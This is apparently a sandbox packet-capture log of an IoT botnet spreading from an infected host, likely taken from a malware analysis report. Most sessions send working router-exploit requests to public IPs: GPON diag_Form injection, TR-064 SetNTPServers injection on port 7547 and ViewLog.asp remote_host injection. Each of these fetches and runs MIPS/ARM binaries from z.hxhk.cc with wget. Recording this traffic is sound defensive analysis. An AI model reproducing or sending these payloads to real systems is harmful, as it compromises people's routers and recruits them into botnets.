Mar 18, 2024 09:57:00.622150898 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:00.953243971 CET	481	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 07:30:40 GMT Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 240 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 4f c1 4e c3 30 0c bd f7 2b cc 4e 70 a0 4e 2b 24 38 44 91 d8 5a c4 a4 01 15 eb 0e 3b a6 4b a4 4e 2a 49 71 1c 10 7f 4f b2 8a 03 b2 f4 24 fb 3d bf 67 cb ab e6 6d d3 1f bb 16 9e fb 97 1d 74 87 f5 6e bb 81 d5 2d e2 b6 ed 9f 10 9b be 59 98 ba 14 88 ed eb 4a 15 72 e4 8f 49 c9 d1 6a 93 1a 3e f3 64 d5 9d 10 b0 d6 06 de ed 67 b4 81 25 2e e3 42 e2 45 26 07 6f 7e f2 66 a5 fe a9 52 5f c8 59 1d 7d 24 18 c8 7f 07 4b 10 ac 63 d0 40 8b 06 78 d4 19 ce 21 11 f4 95 f8 93 8f 93 01 e7 19 a2 33 96 02 6b 67 4a 39 10 60 8e 9b 73 0a 25 d0 c6 90 0d 41 3d ce fa 34 5a ac cb 54 35 5c 1f 86 e8 38 de c0 7e 31 4b de 55 7d 5f 8a 54 15 74 9e 18 1e 84 c4 bf dd e4 77 39 3c 1d 9a 5f 2e 7e 01 25 e7 73 76 2d 01 00 00 Data Ascii: UON0+NpN+$8DZ;KN*IqO$=gmtn-YJrIj>dg%.BE&o~fR_Y}$Kc@x!3kgJ9`s%A=4ZT5\8~1KU}_Ttw9<_.~%sv-

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.23	41680	121.133.186.128	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.643851042 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.23	41220	86.178.198.25	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.651772022 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.23	36606	124.218.48.114	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.653067112 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.23	54046	86.133.48.241	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.692826986 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.23	33704	172.90.168.5	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.704237938 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.23	55654	178.62.236.247	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.732306957 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:00.901443005 CET	496	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 18 Mar 2024 08:57:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding ETag: W/"6582b674-156" Content-Encoding: gzip Data Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 90 bd 4e c4 30 10 84 7b 9e c2 58 a2 74 9c 13 5d 7e ae 01 6a 28 68 a8 90 63 6f ce 96 6c af 65 6f c8 85 a7 07 27 5c 45 b5 df ac 76 67 a4 19 ee 9f 5f 9f de 3f de 5e 98 a5 e0 cf 77 c3 31 18 1b dc 9c 55 00 56 b2 1e b9 25 4a a5 93 52 7b 5c cc aa b6 22 0a 29 72 5a 68 8c 04 91 9a f2 d8 2c 45 80 2a 24 4e 8d 0a ea 1b a3 5a 4b a3 31 48 c8 19 f3 67 52 17 90 41 b9 7a ae a2 06 61 b0 2a 11 54 4a 2e 5e 9a 1a cb d9 1e 39 61 36 90 47 de 72 56 68 f3 30 72 fc 82 3c 7b 5c 3b eb 8c 81 d8 df b4 b8 fe db 6c b7 8d 05 77 b1 d4 9d da f6 a1 5f 9d 21 7b 60 c2 e2 c8 61 ec d4 54 d0 2f 04 3d 61 ea da 74 ed 3d cc b4 43 de 1f 2b 4d 48 84 a1 22 67 87 df c8 ab 0b 67 bb e3 9f 38 0f f2 e8 ea b7 3d b9 d7 c7 7e 00 d9 11 de 34 56 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7eN0{Xt]~j(hcoleo'\Evg_?^w1UV%JR{\")rZh,E$NZK1HgRAzaTJ.^9a6GrVh0r<{\;lw_!{`aT/=at=C+MH"gg8=~4V0
Mar 18, 2024 09:57:00.901459932 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:00 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.23	49828	82.66.56.58	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.737705946 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:00.912256956 CET	336	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Mon, 18 Mar 2024 08:57:00 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Mar 18, 2024 09:57:00.912271976 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:00 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.23	41106	178.22.109.34	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.742427111 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.23	57358	24.209.204.179	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.748744011 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:01.162412882 CET	512	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.23	41820	14.85.144.61	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.758496046 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.23	49390	86.144.50.78	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.797405005 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.23	47702	163.182.121.40	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.820918083 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:00.979686022 CET	96	IN	HTTP/1.1 400 Bad Request Content-Length: 0 Date: Mon, 18 Mar 2024 08:57:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.23	41252	86.178.198.25	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.832395077 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.23	41864	121.133.186.128	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.926615000 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.23	54080	86.133.48.241	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.934598923 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.23	36712	124.218.48.114	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.949006081 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.23	53918	31.52.24.150	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.963591099 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.23	49504	86.144.50.78	7547

Timestamp	Bytes transferred	Direction	Data
